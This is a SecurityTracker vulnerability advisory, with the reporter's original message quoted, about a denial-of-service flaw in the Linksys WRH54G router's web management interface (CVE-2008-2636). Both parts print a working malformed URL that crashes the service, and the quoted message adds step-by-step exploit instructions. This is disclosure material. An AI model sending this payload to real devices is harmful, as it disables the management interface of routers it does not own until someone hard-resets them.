SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   Linksys Router Vendors:   Cisco
Linksys WRH54G Router Management Interface Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1020237
SecurityTracker URL:  http://securitytracker.com/id/1020237
CVE Reference:   CVE-2008-2636   (Links to External Site)
Updated:  Jul 17 2008
Original Entry Date:  Jun 11 2008
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Model WRH54G; firmware 1.01.03
Description:   A vulnerability was reported in the Linksys WRH54G Router. A remote user can cause denial of service conditions.

A remote user can send a specially crafted HTTP request to the management interface to cause the target service to crash. A hard reset is required to return the interface to normal operations.

Traffic processing through the device is not affected.

A demonstration exploit URL is provided:

http://[target]/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefron
t_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagef
ront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pa
gefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront
_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefro
nt_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page
front_page.asp

dubingyao at gmail dot com reported this vulnerability.

Impact:   A remote user can cause the management interface to hang.
Solution:   Some reports indicate that version 1.01.04 is not affected.

[Editor's note: The Cisco/Linksys documentation for driver version 1.01.04 does not mention this vulnerability.]

Vendor URL:  cisco.com/ (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  Remote DoS vulnerability in Linksys WRH54G

1. DESCRIPTION

There is a DoS vulnerability in Cisco Linksys router WRH54G http service. Any anonymous attacker could crash the http service easily
 by sending a malformed http request, and needn't any privilege.

When the device attempts to process the malformed request, it will be possible to corrupt sensitive memory. Although unconfirmed,
 it may also be possible to modify various configuration settings or execute malicious code.

After being attacked, Cisco Linksys router can't be accessed remotely by any user. Http service is not recovered and the attacked
 router can not be managed without a hard reboot. A reboot of router may cause network disconnected. 

Further more, the firewall can still route packets. 

2. Affected products and versions

Affected products:
Cisco Linksys WRH54G and other devices 
(bacause I have no enough other Linksys routers in hand, I can't make sure how many devices this vulnerability can effect.)

Affected versions:
The lasted Firmware v1.01.03  

If Need any privilege:
No

3. ANALYSIS

A malformed http request can cause the http service crashed. The malformed request is mixed by string ./ and overly charactors. Its
 format is as follows:
Http://192.168.1.1/./front_page......front_page.asp

4. EXPLOIT STEPS

4.1 Make sure the router is running normally, and the Web server is right.

4.2 Open the explorer, type following malformed URL, and press ENTER:
http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefron
t_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagef
ront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pa
gefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront
_p
 agefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefro
nt_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page
front_page.asp

4.3 Check the http service, it can't work.


Note:

1. The string ./ in malformed request is necessary. Lack of this string, the http server will ask the anonymous to input auth information.

2. the string .asp in the end of malformed request is also necessary. Lack of this string, we can not crash the http server.

3. The firmware information could be found at: http://www-cn.linksys.com/servlet/Satellite?childpagename=CN%2FLayout&packedargs=page%3D2%26cid%3D1140648553423%26c%3DL_Content_C1&pagename=Linksys%2FCommon%2FVisitorWrapper&SubmittedElement=Linksys%2
FFormSubmit%2FProductDownloadSearch&sp_prodsku=1172713275887

4. There is another DoS vulnerability about malformed http request in Linksys devices(http://www.securityfocus.com/bid/6301/info).
The description and explit are different from this vulnerability. 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC